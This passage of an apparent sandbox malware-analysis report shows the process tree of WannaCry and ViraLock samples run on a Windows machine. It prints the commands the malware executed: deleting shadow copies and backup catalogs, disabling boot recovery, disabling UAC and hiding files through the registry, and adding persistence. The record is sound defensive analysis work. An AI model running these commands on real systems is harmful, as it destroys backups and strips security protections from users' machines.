        cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
        5⤵
        
        PID:4808
      - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic shadowcopy delete
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3416
- - C:\Users\Admin\Downloads\!WannaDecryptor!.exe
    !WannaDecryptor!.exe
    3⤵
    - Executes dropped EXE
    - Sets desktop wallpaper using registry
    - Suspicious use of SetWindowsHookEx
    PID:2852
- C:\Users\Admin\Downloads\WannaCry.exe
  "C:\Users\Admin\Downloads\WannaCry.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:3304
- C:\Users\Admin\Downloads\WannaCry.exe
  "C:\Users\Admin\Downloads\WannaCry.exe"
  2⤵
  - Executes dropped EXE
  PID:60
- C:\Users\Admin\Downloads\WannaCry.exe
  "C:\Users\Admin\Downloads\WannaCry.exe"
  2⤵
  - Executes dropped EXE
  PID:3856
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,1227033257453495626,8729302283363354276,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5840 /prefetch:1
  2⤵
  PID:2540
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2108,1227033257453495626,8729302283363354276,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6976 /prefetch:8
  2⤵
  PID:3852
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,1227033257453495626,8729302283363354276,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6964 /prefetch:1
  2⤵
  PID:2492
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2108,1227033257453495626,8729302283363354276,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4884 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4868
- C:\Users\Admin\Downloads\ViraLock.exe
  "C:\Users\Admin\Downloads\ViraLock.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  PID:1144
- - C:\Users\Admin\gIUsIoUY\QeIwwoYc.exe
    "C:\Users\Admin\gIUsIoUY\QeIwwoYc.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - System Location Discovery: System Language Discovery
    PID:1568
- - C:\ProgramData\PmsAEgIc\liAkMUUQ.exe
    "C:\ProgramData\PmsAEgIc\liAkMUUQ.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious behavior: GetForegroundWindowSpam
    PID:1576
  - - C:\Program Files (x86)\Internet Explorer\iexplore.exe
      "C:\Program Files (x86)\Internet Explorer\iexplore.exe" about:blank
      4⤵
      PID:1132
    - - C:\Program Files\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files\Internet Explorer\IEXPLORE.EXE" about:blank
        5⤵
        Modifies Internet Explorer settings
        Suspicious use of SetWindowsHookEx
        
        PID:5712
      - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:5712 CREDAT:17410 /prefetch:2
        6⤵
        Modifies Internet Explorer settings
        Modifies registry class
        Suspicious use of SetWindowsHookEx
        
        PID:1052
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
    3⤵
    PID:972
  - - C:\Users\Admin\Downloads\ViraLock.exe
      C:\Users\Admin\Downloads\ViraLock
      4⤵
      Executes dropped EXE
      PID:692
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        5⤵
        
        PID:4900
      - C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        6⤵
        Executes dropped EXE
        
        PID:4640
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:1668
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:692
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        8⤵
        Executes dropped EXE
        
        PID:3640
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        9⤵
        
        PID:2668
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        10⤵
        Executes dropped EXE
        
        PID:5088
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        11⤵
        System Location Discovery: System Language Discovery
        
        PID:2036
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        12⤵
        Executes dropped EXE
        
        PID:716
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        13⤵
        
        PID:3580
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        14⤵
        
        PID:2792
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        15⤵
        
        PID:2580
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        16⤵
        
        PID:232
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        17⤵
        
        PID:3396
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        18⤵
        
        PID:944
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        18⤵
        
        PID:5484
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        19⤵
        
        PID:5944
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        20⤵
        
        PID:5588
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        21⤵
        
        PID:5664
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        22⤵
        
        PID:3416
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        23⤵
        System Location Discovery: System Language Discovery
        
        PID:5492
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        24⤵
        
        PID:1920
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        25⤵
        
        PID:4240
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        26⤵
        System Location Discovery: System Language Discovery
        
        PID:5852
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        27⤵
        
        PID:1236
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        28⤵
        
        PID:5888
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        29⤵
        
        PID:3436
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        29⤵
        Modifies visibility of file extensions in Explorer
        System Location Discovery: System Language Discovery
        
        PID:4168
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        29⤵
        
        PID:5572
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        30⤵
        
        PID:4448
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        29⤵
        UAC bypass
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:6100
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        30⤵
        
        PID:2568
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\umkwEsQs.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        29⤵
        
        PID:5652
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        30⤵
        
        PID:5980
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        27⤵
        Modifies visibility of file extensions in Explorer
        
        PID:5992
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        28⤵
        
        PID:3472
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        27⤵
        
        PID:1692
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        28⤵
        
        PID:5756
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        27⤵
        UAC bypass
        Modifies registry key
        
        PID:1668
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RaMIYUME.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        27⤵
        
        PID:5436
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        28⤵
        
        PID:6044
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        28⤵
        System Location Discovery: System Language Discovery
        
        PID:1572
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        25⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:5692
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        26⤵
        
        PID:6136
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        25⤵
        
        PID:5200
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        25⤵
        UAC bypass
        
        PID:5460
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\oiQMMcAM.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        25⤵
        System Location Discovery: System Language Discovery
        
        PID:5148
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        26⤵
        
        PID:2288
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        26⤵
        
        PID:5312
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        23⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:5708
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        23⤵
        
        PID:2984
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        23⤵
        UAC bypass
        
        PID:212
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SEkoMAAk.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        23⤵
        
        PID:4852
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        24⤵
        
        PID:6044
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        21⤵
        Modifies visibility of file extensions in Explorer
        
        PID:5880
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        21⤵
        System Location Discovery: System Language Discovery
        
        PID:5932
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        21⤵
        UAC bypass
        Modifies registry key
        
        PID:5976
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        22⤵
        
        PID:3684
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RUosIAIc.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        21⤵
        
        PID:5428
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        22⤵
        
        PID:2632
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        19⤵
        Modifies visibility of file extensions in Explorer
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:1128
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        19⤵
        
        PID:692
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        19⤵
        UAC bypass
        Modifies registry key
        
        PID:4756
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\kgEgoscs.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        19⤵
        
        PID:5124
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        20⤵
        
        PID:5104
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        17⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:2704
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        17⤵
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:2100
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        17⤵
        UAC bypass
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:3500
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        18⤵
        
        PID:5088
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\JyYosUsE.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        17⤵
        
        PID:2376
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        18⤵
        
        PID:5556
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        15⤵
        Modifies visibility of file extensions in Explorer
        System Location Discovery: System Language Discovery
        
        PID:2776
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        15⤵
        
        PID:968
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        15⤵
        UAC bypass
        Modifies registry key
        
        PID:4768
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        16⤵
        
        PID:3876
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RkgYMQwg.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        15⤵
        
        PID:4536
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        16⤵
        
        PID:5612
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        13⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:3048
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        13⤵
        Modifies registry key
        
        PID:5108
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        13⤵
        UAC bypass
        
        PID:4852
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YoEUUIgw.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        13⤵
        
        PID:4060
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        14⤵
        
        PID:436
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        11⤵
        Modifies visibility of file extensions in Explorer
        
        PID:4756
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        11⤵
        
        PID:4452
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        11⤵
        UAC bypass
        Modifies registry key
        
        PID:4292
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\OQskcEQM.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        11⤵
        
        PID:692
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        12⤵
        
        PID:1236
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        9⤵
        Modifies visibility of file extensions in Explorer
        
        PID:1692
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        9⤵
        
        PID:2200
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        9⤵
        UAC bypass
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:2760
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HmIUYUEk.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        9⤵
        
        PID:4644
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        10⤵
        
        PID:3548
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        10⤵
        
        PID:4988
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        7⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:2760
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        7⤵
        Modifies registry key
        
        PID:972
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:2376
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        7⤵
        UAC bypass
        Modifies registry key
        
        PID:4372
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nyYMIMoU.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        7⤵
        
        PID:3396
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        8⤵
        
        PID:1956
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        5⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:64
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        5⤵
        Modifies registry key
        
        PID:3548
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        5⤵
        UAC bypass
        
        PID:2376
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZSAcsgow.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        5⤵
        
        PID:1604
      - C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        6⤵
        
        PID:2580
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
    3⤵
    - Modifies visibility of file extensions in Explorer
    PID:2288
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
    3⤵
    - Modifies registry key
    PID:4764
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
    3⤵
    - UAC bypass
    - Modifies registry key
    PID:1424
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qOsgcUIA.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1956
  - - C:\Windows\SysWOW64\cscript.exe
      cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
      4⤵
      PID:4556
- C:\Users\Admin\Downloads\ViraLock.exe
  "C:\Users\Admin\Downloads\ViraLock.exe"
  2⤵
  - Executes dropped EXE
  PID:1132
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
    3⤵
    PID:4852
  - - C:\Users\Admin\Downloads\ViraLock.exe
      C:\Users\Admin\Downloads\ViraLock
      4⤵
      Executes dropped EXE
      PID:3940
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:840
      - C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        6⤵
        Executes dropped EXE
        
        PID:3612
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        7⤵
        
        PID:4536
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        8⤵
        Executes dropped EXE
        
        PID:1012
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:64
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        10⤵
        Executes dropped EXE
        
        PID:3640
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        11⤵
        
        PID:5024
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        12⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3044
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        13⤵
        
        PID:944
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        14⤵
        
        PID:1224
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        15⤵
        
        PID:3472
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        16⤵
        
        PID:3684
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        17⤵
        
        PID:4092
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        18⤵
        
        PID:2792
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        18⤵
        
        PID:5424
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        19⤵
        
        PID:5756
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        20⤵
        System Location Discovery: System Language Discovery
        
        PID:5456
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        21⤵
        
        PID:5680
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        22⤵
        System Location Discovery: System Language Discovery
        
        PID:6004
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        23⤵
        
        PID:5620
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        24⤵
        
        PID:5108
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        25⤵
        System Location Discovery: System Language Discovery
        
